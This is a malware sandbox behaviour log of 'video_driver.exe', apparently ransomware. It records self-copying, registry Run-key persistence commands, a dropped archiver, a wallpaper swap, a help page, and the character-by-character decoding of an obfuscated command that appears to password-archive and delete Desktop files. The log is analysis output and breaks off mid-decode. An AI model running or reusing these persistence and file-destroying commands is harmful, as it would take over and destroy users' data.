# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: May 6 2020 08:26:37 # Log Creation Date: 06.05.2020 23:41:50.788 Process: id = "1" image_name = "video_driver.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\video_driver.exe" page_root = "0x4ab75000" os_pid = "0x314" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x310 [0037.288] __set_app_type (_Type=0x1) [0037.289] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x401110) returned 0x0 [0037.333] __getmainargs (in: _Argc=0x407004, _Argv=0x407000, _Env=0x28ff58, _DoWildCard=-1, _StartInfo=0x28ff5c | out: _Argc=0x407004, _Argv=0x407000, _Env=0x28ff58) returned 0 [0037.339] __p__fmode () returned 0x770331f4 [0037.340] atexit (param_1=0x401340) returned 0 [0037.341] atexit (param_1=0x4029a0) returned 0 [0037.341] __p__environ () returned 0x770304e4 [0037.341] AllocConsole () returned 0 [0037.341] FindWindowA (lpClassName="ConsoleWindowClass", lpWindowName=0x0) returned 0x5011c [0037.341] ShowWindow (hWnd=0x5011c, nCmdShow=0) returned 1 [0037.343] _mbscat (in: param_1=0x28f328, param_2=0x3f1019 | out: param_1=0x28f328) returned 0x28f328 [0037.343] getenv (_VarName="TEMP") returned="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp" [0037.343] _mbscat (in: param_1=0x28f328, param_2=0x3f1af1 | out: param_1=0x28f328) returned 0x28f328 [0037.344] system (_Command="copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe\" C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe") returned 0 [0038.460] system (_Command="REG ADD \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"video_driver\" /t REG_SZ /d \"%TEMP%\\video_driver.exe\" /f") returned 0 [0039.254] system (_Command="REG ADD \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"video_driver\" /t REG_SZ /d \"%TEMP%\\video_driver.exe\" /f") returned 0 [0039.506] getenv (_VarName="TEMP") returned="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp" [0039.506] _mbscat (in: param_1=0x28e770, param_2=0x3f1af1 | out: param_1=0x28e770) returned 0x28e770 [0039.506] FindResourceA (hModule=0x0, lpName=0x1, lpType=0xa) returned 0x40b0c0 [0039.506] LoadResource (hModule=0x0, hResInfo=0x40b0c0) returned 0x40b100 [0039.506] LockResource (hResData=0x40b100) returned 0x40b100 [0039.506] SizeofResource (hModule=0x0, hResInfo=0x40b0c0) returned 0xb3200 [0039.506] fopen (_Filename="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\mod_01.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\mod_01.exe"), _Mode="wb") returned 0x77032960 [0039.507] fwrite (in: _Str=0x40b100*, _Size=0xb3200, _Count=0x1, _File=0x77032960 | out: _Str=0x40b100*, _File=0x77032960) returned 0x1 [0039.523] fclose (in: _File=0x77032960 | out: _File=0x77032960) returned 0 [0039.531] getenv (_VarName="USERPROFILE") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0039.531] _mbscat (in: param_1=0x28e770, param_2=0x3f1b7e | out: param_1=0x28e770) returned 0x28e770 [0039.531] FindResourceA (hModule=0x0, lpName=0x2, lpType=0xa) returned 0x40b0d0 [0039.531] LoadResource (hModule=0x0, hResInfo=0x40b0d0) returned 0x4be300 [0039.532] LockResource (hResData=0x4be300) returned 0x4be300 [0039.532] SizeofResource (hModule=0x0, hResInfo=0x40b0d0) returned 0x3093 [0039.532] fopen (_Filename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\new_background.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\new_background.bmp"), _Mode="wb") returned 0x77032960 [0039.549] fwrite (in: _Str=0x4be300*, _Size=0x3093, _Count=0x1, _File=0x77032960 | out: _Str=0x4be300*, _File=0x77032960) returned 0x1 [0039.550] fclose (in: _File=0x77032960 | out: _File=0x77032960) returned 0 [0039.551] system (_Command="reg add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"%USERPROFILE%\\new_background.bmp\" /f") returned 0 [0039.916] system (_Command="RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True") returned 0 [0041.281] system (_Command="RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True") returned 0 [0041.926] system (_Command="RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True") returned 0 [0042.672] system (_Command="RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True") returned 0 [0043.214] getenv (_VarName="USERPROFILE") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0043.214] _mbscat (in: param_1=0x28e770, param_2=0x3f1b7e | out: param_1=0x28e770) returned 0x28e770 [0043.214] FindResourceA (hModule=0x0, lpName=0x3, lpType=0xa) returned 0x40b0e0 [0043.214] LoadResource (hModule=0x0, hResInfo=0x40b0e0) returned 0x4c1394 [0043.214] LockResource (hResData=0x4c1394) returned 0x4c1394 [0043.214] SizeofResource (hModule=0x0, hResInfo=0x40b0e0) returned 0x373 [0043.214] fopen (_Filename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\help.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\help.html"), _Mode="wb") returned 0x77032960 [0043.215] fwrite (in: _Str=0x4c1394*, _Size=0x373, _Count=0x1, _File=0x77032960 | out: _Str=0x4c1394*, _File=0x77032960) returned 0x1 [0043.215] fclose (in: _File=0x77032960 | out: _File=0x77032960) returned 0 [0043.217] system (_Command="start iexplore.exe %userprofile%/help.html") returned 0 [0056.473] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x401a79, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x60 [0056.474] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40215c, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x64 [0056.475] WaitForMultipleObjects (nCount=0x2, lpHandles=0x28e768*=0x60, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 22 os_tid = 0x358 [0056.484] strlen (_Str="li#h{lvw#%(XVHUSURILOH(_Ghvnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.484] strlen (_Str="ii#h{lvw#%(XVHUSURILOH(_Ghvnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.484] strlen (_Str="if#h{lvw#%(XVHUSURILOH(_Ghvnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.484] strlen (_Str="if h{lvw#%(XVHUSURILOH(_Ghvnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.484] strlen (_Str="if e{lvw#%(XVHUSURILOH(_Ghvnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.484] strlen (_Str="if exlvw#%(XVHUSURILOH(_Ghvnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.484] strlen (_Str="if exivw#%(XVHUSURILOH(_Ghvnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.484] strlen (_Str="if exisw#%(XVHUSURILOH(_Ghvnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.484] strlen (_Str="if exist#%(XVHUSURILOH(_Ghvnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.484] strlen (_Str="if exist %(XVHUSURILOH(_Ghvnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.484] strlen (_Str="if exist \"(XVHUSURILOH(_Ghvnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.484] strlen (_Str="if exist \"%XVHUSURILOH(_Ghvnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.484] strlen (_Str="if exist \"%UVHUSURILOH(_Ghvnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.484] strlen (_Str="if exist \"%USHUSURILOH(_Ghvnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.484] strlen (_Str="if exist \"%USEUSURILOH(_Ghvnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.484] strlen (_Str="if exist \"%USERSURILOH(_Ghvnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.484] strlen (_Str="if exist \"%USERPURILOH(_Ghvnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPRRILOH(_Ghvnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPROILOH(_Ghvnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPROFLOH(_Ghvnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPROFIOH(_Ghvnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPROFILH(_Ghvnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPROFILE(_Ghvnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPROFILE%_Ghvnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPROFILE%\\Ghvnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPROFILE%\\Dhvnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPROFILE%\\Devnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPROFILE%\\Desnwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPROFILE%\\Deskwrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPROFILE%\\Desktrs_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPROFILE%\\Desktos_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPROFILE%\\Desktop_%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\%#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\"#iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" 